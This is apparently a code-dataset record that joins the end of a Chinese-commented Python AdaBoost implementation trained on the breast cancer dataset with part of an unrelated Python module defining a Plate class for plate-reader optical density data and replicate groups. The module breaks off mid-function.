# 预测结果其实是为了后面做准备的,在算法8.1第四步式8.4中exp内部有个Gx,要用在那个地方
# 以此来更新新的D
return np.array(predict), error
def CreateSingleBoostingTree(x_train, y_train, D):
"""
创建单层提升树
:param x_train:训练数据集
:param y_train:训练标签集
:param D:权值分布
:return:单层提升树
"""
# 获得样本数目及特征数量
m, n = np.shape(x_train)
# 单层树的字典,用于存放当前层提升树的参数
# 也可以认为该字典代表了一层提升树
singleBoostTree = {}
# 初始化分类误差率,分类误差率在算法8.1步骤(2)(b)有提到
# 误差率最高也只能100%,因此初始化为1
singleBoostTree['error'] = 1
# 对每一个特征进行遍历,寻找用于划分的最合适的特征
for i in range(n):
# 因为特征已经经过二值化,只能为0和1,因此分切分时分为-0.5,0.5,1.5三种进行切割
for div in [-0.5, 0.5, 1.5]:
# 在单个特征内对正反例进行划分时,有两种情况:
# 可能是小于某值的为1,大于某值得为-1,也可能小于某值得是-1,反之为1
# 因此在寻找最佳提升树的同时对于两种情况也需要遍历运行
# LisOne:Low is one:小于某值得是1
# HisOne:High is one:大于某值得是1
for rule in ['LisOne', 'HisOne']:
# 按照第i个特征,以值div进行切割,进行当前设置得到的预测和分类错误率
Gx, error = Caculation_error_Gx(x_train, y_train, i, div, rule, D)
# 如果分类错误率e小于当前最小的e,那么将它作为最小的分类错误率保存
if error < singleBoostTree['error']:
singleBoostTree['error'] = error
# 同时也需要存储最优划分点、划分规则、预测结果、特征索引
# 以便进行D更新和后续预测使用
singleBoostTree['div'] = div
singleBoostTree['rule'] = rule
singleBoostTree['Gx'] = Gx
singleBoostTree['feature'] = i
# 返回单层的提升树
return singleBoostTree
def CreateBoostingTree(x_train, y_train, treeNum = 50):
"""
创建提升树
创建算法依据“8.1.2 AdaBoost算法” 算法8.1
:param x_train:训练数据集
:param y_train:训练标签
:param treeNum:树的层数
:return:提升树
"""
# 将数据和标签转化为数组形式
trainDataArr = np.array(x_train)
trainLabelArr = np.array(y_train)
# 没增加一层数后,当前最终预测结果列表
finalpredict = [0] * len(trainLabelArr)
# 获得训练集数量以及特征个数
m, n = np.shape(trainDataArr)
# 依据算法8.1步骤(1)初始化D为1/N
D = [1 / m] * m
# 初始化提升树列表,每个位置为一层
tree = []
# 循环创建提升树
for i in range(treeNum):
# 得到当前层的提升树
curTree = CreateSingleBoostingTree(trainDataArr, trainLabelArr, D)
# 根据式8.2计算当前层的alpha
alpha = 1 / 2 * np.log((1 - curTree['error']) / curTree['error'])
# 获得当前层的预测结果,用于下一步更新D
Gx = curTree['Gx']
# 依据式8.4更新D
# 考虑到该式每次只更新D中的一个w,要循环进行更新知道所有w更新结束会很复杂(其实
# 不是时间上的复杂,只是让人感觉每次单独更新一个很累),所以该式以向量相乘的形式,
# 一个式子将所有w全部更新完。
# 该式需要线性代数基础,如果不太熟练建议补充相关知识,当然了,单独更新w也一点问题没有
# np.multiply(trainLabelArr, Gx):exp中的y*Gm(x),结果是一个行向量,内部为yi*Gm(xi)
# np.exp(-1 * alpha * np.multiply(trainLabelArr, Gx)):上面求出来的行向量内部全体
# 成员再乘以-αm,然后取对数,和书上式子一样,只不过书上式子内是一个数,这里是一个向量
# D是一个行向量,取代了式中的wmi,然后D求和为Zm
# 书中的式子最后得出来一个数w,所有数w组合形成新的D
# 这里是直接得到一个向量,向量内元素是所有的w
# 本质上结果是相同的
D = np.multiply(D, np.exp(-1 * alpha * np.multiply(trainLabelArr, Gx))) / sum(D)
# 在当前层参数中增加alpha参数,预测的时候需要用到
curTree['alpha'] = alpha
# 将当前层添加到提升树索引中。
tree.append(curTree)
# -----以下代码用来辅助,可以去掉---------------
# 根据8.6式将结果加上当前层乘以α,得到目前的最终输出预测
finalpredict += alpha * Gx
# 计算当前最终预测输出与实际标签之间的误差
error = sum([1 for i in range(len(x_train)) if np.sign(finalpredict[i]) != trainLabelArr[i]])
# 计算当前最终误差率
finalError = error / len(x_train)
# 如果误差为0,提前退出即可,因为没有必要再计算算了
if finalError == 0:
return tree
# 打印一些信息
print('iter:%d:%d, single error:%.4f, final error:%.4f'%(i, treeNum, curTree['error'], finalError))
# 返回整个提升树
return tree
def predict(x, div, rule, feature):
"""
输出单层的预测结果
:param x:预测样本
:param div:划分点
:param rule:划分规则
:param feature:进行操作的特征
:return:
"""
#依据划分规则定义小于及大于划分点的标签
if rule == 'LisOne':
L = 1; H = -1
else:
L = -1; H = 1
#判断预测结果
if x[feature] < div:
return L
else:
return H
def model_test(x_test, y_test, tree):
"""
测试模型
:param x_test:测试数据集
:param y_test:测试标签集
:param tree:提升树
:return:准确率
"""
# 错误率计数值
errorCnt = 0
# 遍历每一个测试样本
for i in range(len(x_test)):
# 预测结果值,初始为0
res = 0
# 依据算法8.1式8.6
# 预测式子是一个求和式,对于每一层的结果都要进行一次累加
# 遍历每层的树
for curTree in tree:
# 获取该层参数
div = curTree['div']
rule = curTree['rule']
feature = curTree['feature']
alpha = curTree['alpha']
# 将当前层结果加入预测中
res += alpha * predict(x_test[i], div, rule, feature)
#预测结果取sign值,如果大于0 sign为1,反之为0
if np.sign(res) != y_test[i]:
errorCnt += 1
#返回准确率
return float(1 - errorCnt / len(x_test))
# 将所有数据(不包括标签)进行二值化处理
def find_init_div(data):
inMat = data.copy()
# 求每一列的均值
# axis=0意味着取这列的每一行出来求均值,最终得到所有的列的均值
inMeans = np.mean(inMat, axis=0)
# 每一个特征属性标准化
inMat = inMat - inMeans
inMat = inMat.applymap(lambda x: int(0) if x <= 0 else 1)
inMat = np.array(inMat)
return inMat
if __name__ == '__main__':
# 开始时间
start = time.time()
# 获取训练集和测试集
breastcancer = datasets.load_breast_cancer()
# print(breastcancer)
# 创建一个dataframe表型数据结构
df = pd.DataFrame(breastcancer.data, columns=breastcancer.feature_names)
# 列尾添加新的一列'label', 值为iris.target(Series对象)
df['label'] = breastcancer.target
print(df)
# 找到训练数据集的初始阈值,依据初始阈值将数据进行二值化处理,大于v的转换成1,小于v的转换成0,方便后续计算
# 打乱数据
data = find_init_div(df.iloc[:, :-1])
print(data)
target = np.array(df.iloc[:, -1])
print(target)
x_train, x_test, y_train, y_test = Train_test_split(data, target)
# print(x_train)
# print(x_test)
# 转换为二分类任务
# 替换标签把0,1换成-1,1
y_train = np.array([int(1) if i == 1 else int(-1) for i in y_train])
# print(x, y)
# 替换标签把0,1换成-1,1
y_test = np.array([int(1) if i == 1 else int(-1) for i in y_test])
# 创建提升树
print('start init train')
tree = CreateBoostingTree(x_train, y_train, 100)
# 测试
print('start to test')
accuracy = model_test(x_test, y_test, tree)
print('the accuracy is:%.4f' % (accuracy * 100), '%')
print(accuracy)
# 结束时间
end = time.time()
print('time span:', end - start)
# the accuracy is:97.0760 %
|
BobTsang1995/StatisticalLearningMethod-python-
|
AdaBoost.py
|
AdaBoost.py
|
py
| 12,463 |
python
|
zh
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "random.seed",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.multiply",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "numpy.sign",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.sign",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 278,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets.load_breast_cancer",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets",
"line_number": 281,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 295,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 303,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 306,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 319,
"usage_type": "call"
}
] |
20269902024
|
import os.path
import math
import numpy
import json
import bz2
import platereader
from platereader.replicate import Replicate
from platereader.statusmessage import StatusMessage, Severity
from platereader.csvunicode import CsvFileUnicodeWriter, CsvFileUnicodeReader
from platereader.parser import tecan, bioscreen
class Plate(object):
"""
Class containing the wells and holding plate-wide parameters.
"""
_parser2module = platereader.parser.modulenameToModule(
list(platereader.parser.getModulesOfNamespace(platereader.parser)),
replace='platereader.parser.',
lower=True)
_isNotPlateParameter={
'allowMaxGrowthrateAtLowerCutoff': True,
'allowGrowthyieldSlopeNStderrAwayFromZero': True,
}
def __init__(self,filename=None,fileformat=None,
time=None,rawOds=None,
sampleIds=None,conditions=None,wellids=None,plateId=None):
"""
Constructor.
If filename is not None and fileformat is None some heuristics
are used to identify the file format.
:param filename: name of serialised Plate or ascii file exported by the plate reader.
:type filename: str
:param fileformat: string indicating the format ('gat', 'tecan')
:type fileformat: str
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOds: list of optical density arrays
:type rawOds: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
"""
self.plateId=None
self._rawOd=None
self.wells=None
self.time=None
self.temperature=None
self.timeunit=None
self._inheritableParameters={}
# default parameters
self._inheritableParameters['maxGrowthLowerTimeCutoff']=None
self._inheritableParameters['maxGrowthUpperTimeCutoff']=None
self._inheritableParameters['allowMaxGrowthrateAtLowerCutoff']=False
self._inheritableParameters['allowGrowthyieldSlopeNStderrAwayFromZero']=1
# pure plate parameters
self._inheritableParameters['logOdCutoff']=None
self._inheritableParameters['lagAtLogOdEquals']=-5
self._inheritableParameters['slidingWindowSize']=10
self._inheritableParameters['hdCorrectionLinear']=None
self._inheritableParameters['hdCorrectionQuadratic']=None
self._inheritableParameters['hdCorrectionCubic']=None
self._inheritableParameters['smoothingK']=5
self._inheritableParameters['smoothingS']=0.01
self._loadStatus=StatusMessage()
self._capitaliseBackgroundIds=['blank','background']
self._clearMetadata()
if filename is not None:
if not os.path.exists(filename):
raise IOError("No such file or directory: '"+filename+"'")
if fileformat is None:
if filename.endswith('.gat'):
fileformat='gat'
else:
scorefileformat=[]
for fileformat in Plate._parser2module:
score=Plate._parser2module[fileformat].isPlateFormat(filename)
if score > 0.:
scorefileformat.append({'score': score, 'fileformat': fileformat})
scorefileformat = sorted(scorefileformat, key=lambda k: k['score'],reverse=True)
if not len(scorefileformat):
raise Plate.UnknownFileFormat(filename,detailedError='Cannot determine file format')
fileformat=scorefileformat[0]['fileformat']
if fileformat == 'gat':
self._load(filename)
elif fileformat in Plate._parser2module:
time, rawOd, sampleIds, conditions, plateId, temperature, wellids=Plate._parser2module[fileformat].parse(filename)
self._initFromArrays(time,rawOd,sampleIds,conditions,plateId=plateId,temperature=temperature,wellids=wellids)
else:
raise Plate.UnknownFileFormat(filename,serFormat=fileformat)
self.readfileformat=fileformat
elif rawOds is not None:
self._initFromArrays(time,rawOds,sampleIds,conditions,plateId=plateId,wellids=wellids)
else:
raise RuntimeError('could not construct Plate, neither filename nor arrays given')
self.modified=False
def _clearReplicateGroups(self):
if hasattr(self,'replicateGroups'):
for tc in self.replicateGroups:
# NOTE invalidating here so code holding references to these fails
tc._invalidate()
self.replicateGroups=None
self._backgroundGroupIndices=None
self._sampleConditionToReplicateGroupIdcs=None # an associative array mapping replicate groups by sample ID to a list of Replicate object indices
self._conditionToReplicateGroupIdx=None # an associative array mapping condition to a list of replicate group object indices
def _clearMetadata(self):
self._clearReplicateGroups()
self._setBackgroundForAllReplicates(None)
self._conditionToWellIdx=None # an associative array mapping condition to a list of Replicate objects
self._sampleConditionToWellIdcs=None # an associative array mapping wells (sample IDs) to a list of Replicate object indices
def _load(self,filename):
with bz2.BZ2File(filename, 'r') as rfile:
pickled=rfile.read().decode("utf-8")
try:
unpickled = json.loads(pickled)
except ValueError as err:
raise Plate.UnknownFileFormat(filename,detailedError=str(err))
return self._deserialise(unpickled,filename)
def _deserialise(self,unpickled,filename):
if 'format' not in unpickled:
raise Plate.UnknownFileFormat(filename,detailedError='no "format" keyword found in file')
serFormatVersion=unpickled['formatversion'] if 'formatversion' in unpickled else 'undefined'
if unpickled['format'] != 'opticaldensityplate' or serFormatVersion != '1':
raise Plate.UnknownFileFormat(filename,serFormat=unpickled['format'],serFormatVersion=serFormatVersion)
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
# reset these to make sure defaults given to constructor are not used for serialised plate
for par in self._inheritableParameters:
self._inheritableParameters[par]=None
self.plateId=unpickled['plateId']
self.time=numpy.array(unpickled['time'],dtype=float)
self.timeunit=unpickled['timeunit']
# defaut parameters, some of which can be overridden by the individual replicates
for par in parkeys:
self._inheritableParameters[par]=unpickled[par]
if 'temperature' in unpickled:
self.temperature=numpy.array(unpickled['temperature'],dtype=float)
self._rawOd=[]
for lst in unpickled['rawOd']:
self._rawOd.append(numpy.array(lst,dtype=float))
self.wells=[]
for tcup in unpickled['wells']:
self.wells.append(Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format']))
self.replicateGroups=[]
for tcup in unpickled['replicateGroup']:
comptc=Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format'],isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
# deferred to here: set the background index
for tc in self.wells:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
for tc in self.replicateGroups:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
# reset background indices, as these have been initialised
# before setting the replicate's backgrounds
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
self._setBackgroundStatus()
def _serialise(self):
"""
Generates a dictionary of the plate data and parameters.
For internal use only.
"""
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
sr=dict()
sr["format"]='opticaldensityplate'
sr["formatversion"]='1' # this is an unsigned integer
sr['plateId']=self.plateId
sr['time']=self.time.tolist()
sr['timeunit']=self.timeunit
for key in parkeys:
sr[key]=self._inheritableParameters[key]
if self.temperature is not None:
sr['temperature']=self.temperature.tolist()
sr['rawOd']=[]
for raw in self._rawOd:
sr['rawOd'].append(raw.tolist())
sr['wells']=[]
for tc in self.wells:
sr['wells'].append(tc._serialise())
sr['replicateGroup']=[]
for tc in self.replicateGroups:
sr['replicateGroup'].append(tc._serialise())
return sr
def save(self,filename):
"""
Saves the plate content in a file.
:param filename: Name of the file.
:type filename: str
:return: StatusMessage/None -- non-fatal notifications.
"""
status=None
if not filename.endswith('.gat'):
root, ext = os.path.splitext(filename)
status=StatusMessage(
key='Saving file',shortmsg='wrongExtension',
longmsg=('GATHODE uses a file extension that is different from"'+ext+'". '
+'This means that a future version of this program will not be able to open this file with the graphical user interface. '
+'Please make save the file with the ".gat" extension.'),
severity=Severity.warning)
sr=self._serialise()
pickled = json.dumps(sr)
with bz2.BZ2File(filename, 'w') as wfile:
wfile.write(pickled.encode('utf-8'))
self.modified=False
return status
def _explicitlySetParsInChildWells(self,par):
"""
Explicitly set parameters in wells to their inherited values.
This can be used when replicate groups get removed
(e.g. setting new metadata) but the parameters should be
preserved. You most likely want to call
_reduceExplicitParameter once new replicate groups have been
created.
For internal use only.
"""
for tc in self.replicateGroups:
for child in tc.childWells():
# copy parameters from replicate group to the child
child._setExplicitParameter(par,child.getParameter(par))
def _reduceExplicitParameter(self,par):
"""
Sets the parameter par of self and wells such that it is shared by most of its children.
For internal use only.
:param par: the parameter for which a smaller set of values is created
:type par: string
"""
# check what could be the plate default for this parameter
parvals=Plate._getChildParvalOccurrence(self,par)
platedefault=Plate._chooseDefaultFromOccurrences(parvals)
# set parameters in replicate groups; if one of a groups's children has the same value
# as the platedefault use that one, otherwise try find another value for the group
for tc in self.replicateGroups:
Plate._reduceExplicitParametersHelper(tc,par,platedefault)
# now set the plate default (important: this has to be done *after* the Replicates are changed!)
Plate._reduceExplicitParametersHelper(self,par,platedefault)
return platedefault
@staticmethod
def _reduceExplicitParametersHelper(obj,par,parentdefault):
"""
Helper function for _reduceExplicitParameter
For internal use only.
:param obj: the parameter for that a smaller set of values is created
:type obj: Plate/Replicates
:param par: the parameter for that a smaller set of values is created
:type par: string
Will be called with plate and Replicate objects.
"""
# gather occurrence of each value for this parameter in children
parvals=Plate._getChildParvalOccurrence(obj,par)
# the value that occurs most often will become the replicate group's value
newdefaultval=Plate._chooseDefaultFromOccurrences(parvals,parentdefault)
# only if none of the children got value None we can copy values up
if newdefaultval is None:
return
# delete consensus value from children
for child in Plate._getChildren(obj):
if newdefaultval == child.getParameter(par):
child._setExplicitParameter(par,None)
# set consensus value for replicate group parent
obj._setExplicitParameter(par,newdefaultval)
@staticmethod
def _getChildParvalOccurrence(obj,par):
"""
Return count of parameter values of all leaf children (at the lowest level of the hierarchy).
For internal use only.
:return: dict -- { value1: countValue1, value2: countValue2, ...}
"""
if isinstance(obj, Replicate) and not obj.isReplicateGroup():
# this is a single well
val=obj.getParameter(par)
return {val: 1}
else:
parvals={}
for child in Plate._getChildren(obj):
childparvals=Plate._getChildParvalOccurrence(child,par)
# assemble childrens' results into the main dictionary
for val in childparvals:
if val not in parvals:
parvals[val]=0
parvals[val]+=childparvals[val]
return parvals
@staticmethod
def _chooseDefaultFromOccurrences(parvals,parentdefault=None):
"""
Return the value of a parameter that occurs most often in leaf children.
For internal use only.
Can be called both without parentdefault (for the whole plate)
and with parentdefault (for ReplicateGroups).
:param parvals: output from _getChildParvalOccurrence
:type parvals: dict
:return: float -- the most occuring parameter value for this plate or ReplicateGroup
"""
if None in parvals:
return None
maxcnt=0
maxval=None
parvalkeys=list(parvals.keys())
parvalkeys.sort()
for val in parvalkeys:
# if there is a value corresponding to the plate default choose that one
if parentdefault is not None and val == parentdefault:
return parentdefault
# choose maximal occurring as default
if parvals[val] > maxcnt:
maxval=val
maxcnt=parvals[val]
return maxval
@staticmethod
def _getChildren(obj):
if isinstance(obj, Plate):
# this is a plate
return obj.replicateGroups
else:
# this is a replicate group
return obj.childWells()
@staticmethod
def capitaliseId(sampleId,capitaliseThese):
"""
Capitalise id if in given list.
:param sampleId: sample id; if this matches capitaliseThese it will be capitalised
:type sampleId: str
:param capitaliseThese: list of sample ids that correspond to samples that should be capitalised
:type capitaliseThese: list(str)
:return: str -- sample id (capitalised if it matches one of capitaliseThese)
"""
for bgid in capitaliseThese:
if sampleId.upper() == bgid.upper():
return bgid.upper()
return sampleId
def _initFromArrays(self,time,rawOd,sampleIds,conditions,plateId=None,temperature=None,wellids=None):
"""
Initialises a plate from numpy arrays.
For internal use only.
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOd: list of optical density arrays
:type rawOd: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
:param temperature: array of the temperature
:type time: numpy.array(float)
:param wellids: array of ids for the wells (e.g. A1 to P24)
:type wellids: list(str)
"""
if len(rawOd) != len(sampleIds):
raise RuntimeError('number of raw optical density arrays is different from number of sample ids')
if len(sampleIds) != len(conditions):
raise RuntimeError('number of sample ids is different from number of conditions')
if wellids is not None and len(wellids) != len(set(wellids)):
raise RuntimeError('ids in wellids are not unique')
self.plateId=plateId
self.time=time/3600.
self.timeunit="h"
self._rawOd=rawOd
# make sure that background is correctly identified even if case is different
newSampleIds=[]
for sampleid in sampleIds:
newSampleIds.append(Plate.capitaliseId(sampleid,self._capitaliseBackgroundIds))
# create replicate objects for single wells from data (NOTE ids may exist multiple times, therefore this is not an associative array)
self.wells=[]
tcidx=0
for sampleid in newSampleIds:
wellid = [wellids[tcidx]] if wellids is not None else None
self.wells.append(Replicate(self,[tcidx],sampleid,conditions[tcidx],wellid))
# NOTE that on purpose this index is only increased for samples (not for time, temperature, ...)
tcidx+=1
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
def wellMetadataOk(self,metadata):
"""
Check that the given metadata (i.e. sample id, growth condition) is valid and can be applied.
This basically checks that there is the right amount of
metadata entries and these contain sample ids and conditions.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
:return: bool, StatusMessage -- True if ok, False otherwise (and a StatusMessage with details)
"""
if len(metadata) != len(self.wells):
return False, StatusMessage(
key='Wrong metadata length:',shortmsg='metadata:wrongLength',
longmsg=('Number of metadata entries ('+str(len(metadata))+
') is different from number of wells '+str(len(self.wells))),
severity=Severity.failed)
idx=0
for metdat in metadata:
idx+=1
if len(metdat.keys()) != 2 or 'sample' not in metdat or 'condition' not in metdat:
thekeys='"'+('" "'.join(sorted(metdat.keys())))+'"' if len(metdat.keys()) else 'nothing'
return False, StatusMessage(
key='Wrong metadata elements:',shortmsg='metadata:wrongLength',
longmsg=('metadata for entry '+str(idx)+' contains '+thekeys+
', but should contain "condition" and "sample"'),
severity=Severity.failed)
return True, StatusMessage()
def setWellMetadata(self,metadata):
"""
Set the metadata (e.g. sample id, growth condition) of the wells.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
"""
metok, message = self.wellMetadataOk(metadata)
if not metok:
raise Plate.BadMetadata(str(message))
# propagate parameters to the wells before deleting replicate groups
for par in self.wells[0]._inheritableParameters.keys():
self._explicitlySetParsInChildWells(par)
# clear everything that depends on metadata
self._clearMetadata()
# set metadata of the wells
wellit=self.wells.__iter__()
for metdat in metadata:
metdat['sample']=Plate.capitaliseId(metdat['sample'],self._capitaliseBackgroundIds)
well=next(wellit)
well._setMetadata(metdat)
# create replicate groups based on sample ids and conditions
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
# propagate parameters from the wells to the replicate groups (or plate) if possible
for par in self.wells[0]._inheritableParameters.keys():
self._reduceExplicitParameter(par)
def wellMetadata(self):
"""
Return the metadata of the wells.
:return: list(dict) -- metadata
"""
metadata=[]
for well in self.wells:
metadata.append(well._getMetadata())
return metadata
def _setupBackgroundIndices(self):
"""
Set self._backgroundGroupIndices and self._backgroundWellIndices.
Records the indices of tc.background (which are rpelicate
groups) for all wells and replicateGroups and also the indices
of the underlying background wells.
For internal use only.
"""
self._backgroundGroupIndices=set()
self._backgroundWellIndices=set()
if self.wells:
for tc in self.wells:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
if self.replicateGroups:
for tc in self.replicateGroups:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
for idx in self._backgroundGroupIndices:
for chldidx in self.replicateGroups[idx].childWellIndices():
self._backgroundWellIndices.add(chldidx)
def _guessBackgroundSampleIds(self):
"""
Guess sample ids of background wells ("BLANK" or "BACKGROUND")
For internal use only.
"""
backgroundKeys={}
for tc in self.wells:
if tc.sampleid == "BLANK" or tc.sampleid == "BACKGROUND":
backgroundKeys[tc.sampleid]=1
backgroundSampleIds=sorted(list(backgroundKeys.keys()))
return backgroundSampleIds
def _setBackgroundStatus(self):
"""
Add conditions/samples for which no background was found to self._loadStatus
This should be called when the background was set for some wells/replicate groups.
For internal use only.
"""
self._loadStatus.removeStatusesWithKey('No background samples:')
self._loadStatus.removeStatusesWithKey('No background for some samples:')
backgroundSampleIds=set()
for idx in self.backgroundReplicateGroupIndices():
backgroundSampleIds.add(self.replicateGroups[idx].sampleid)
for idx in self.backgroundWellIndices():
backgroundSampleIds.add(self.wells[idx].sampleid)
if len(backgroundSampleIds) < 1:
self._loadStatus.addStatus(
StatusMessage(
key='No background samples:',shortmsg='plateinit:noBackground',
longmsg=('No background (blank) wells could be identified.'+
' This means no growth parameters will be extracted'),
severity=Severity.warning)
)
return
noBackground={}
for tc in self.nonBackgroundWells():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
for tc in self.nonBackgroundReplicates():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
if len(noBackground.keys()):
affected=''
for condition in sorted(noBackground):
if condition is None or condition == '':
affected+='no condition:'
else:
affected+=condition+':'
for sampleid in sorted(noBackground[condition]):
affected+=' '+sampleid
affected+='\n'
self._loadStatus.addStatus(
StatusMessage(
key='No background for some samples:',shortmsg='plateinit:noBackgroundForSomeSamples',
longmsg=('For some conditions no background (blank) could be identified.'+
' This means no growth parameters will be extracted. The affected samples are:\n'+
affected),
severity=Severity.warning)
)
def backgroundReplicateGroupIndices(self):
"""
Return indices into self.replicateGroups for replicate groups being listed as background.
:return: list(int) -- indices of background replicate groups
"""
if self._backgroundGroupIndices is None:
self._setupBackgroundIndices()
return self._backgroundGroupIndices
def backgroundReplicateGroups(self):
"""
Return replicate groups being listed as background.
:return: list(Replicate) -- replicate groups listed as background
"""
tcs=[]
for idx in self.backgroundReplicateGroupIndices():
tcs.append(self.replicateGroups[idx])
return tcs
def backgroundWellIndices(self):
"""
Return indices into self.wells for wells being listed as background.
:return: list(int) -- indices of background wells
"""
if self._backgroundWellIndices is None:
self._setupBackgroundIndices()
return self._backgroundWellIndices
def backgroundWells(self):
"""
Return wells being listed as background.
:return: list(Replicate) -- wells listed as background
"""
tcs=[]
for idx in self.backgroundWellIndices():
tcs.append(self.wells[idx])
return tcs
def _createSampleConditionToWellIndices(self):
"""
Create a mapping to quickly find single-well objects based on sample id and condition.
For internal use only.
"""
# gather sampleids and conditions
self._conditionToWellIdx={}
self._sampleConditionToWellIdcs={}
tcidx=0
for tc in self.wells:
# add well to the condition mapping
if tc.condition not in self._conditionToWellIdx:
self._conditionToWellIdx[tc.condition]=[]
self._conditionToWellIdx[tc.condition].append(tcidx)
# add well to the replicate mapping (sampleid and condition)
if tc.sampleid not in self._sampleConditionToWellIdcs:
self._sampleConditionToWellIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToWellIdcs[tc.sampleid]:
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition].append(tcidx)
tcidx+=1
def _createReplicateGroupsFromSampleIdsNConditions(self):
"""
Create replicate groups by grouping wells of the same sample id and condition.
For internal use only.
"""
if self._sampleConditionToWellIdcs is None:
self._createSampleConditionToWellIndices()
sampleids=list(self._sampleConditionToWellIdcs.keys())
sampleids.sort()
self.replicateGroups=[]
for sampleid in sampleids:
conditions=list(self._sampleConditionToWellIdcs[sampleid].keys())
conditions.sort()
for condition in conditions:
comptc=Replicate(self,self._sampleConditionToWellIdcs[sampleid][condition],
None,condition,isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
def _createSampleConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find replicate groups based on sample id and condition.
For internal use only.
"""
self._sampleConditionToReplicateGroupIdcs={}
coidx=0
for tc in self.replicateGroups:
if tc.sampleid not in self._sampleConditionToReplicateGroupIdcs:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToReplicateGroupIdcs[tc.sampleid]:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition].append(coidx)
coidx+=1
def _createConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find all replicate groups for a specific condition.
For internal use only.
"""
self._conditionToReplicateGroupIdx={}
coidx=0
for tc in self.replicateGroups:
# add replicate group to the condition mapping
if tc.condition not in self._conditionToReplicateGroupIdx:
self._conditionToReplicateGroupIdx[tc.condition]=[]
self._conditionToReplicateGroupIdx[tc.condition].append(coidx)
coidx+=1
def _setBackgroundForAllReplicates(self,backgroundSampleIds):
"""
Set background replicate group for single-wells and replicate groups.
Currently, if there are multiple background ids, an exception is raised.
For internal use only.
"""
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
if backgroundSampleIds is None or not len(backgroundSampleIds):
if self.wells is not None:
for tc in self.wells:
tc._setBackgroundIndex(None)
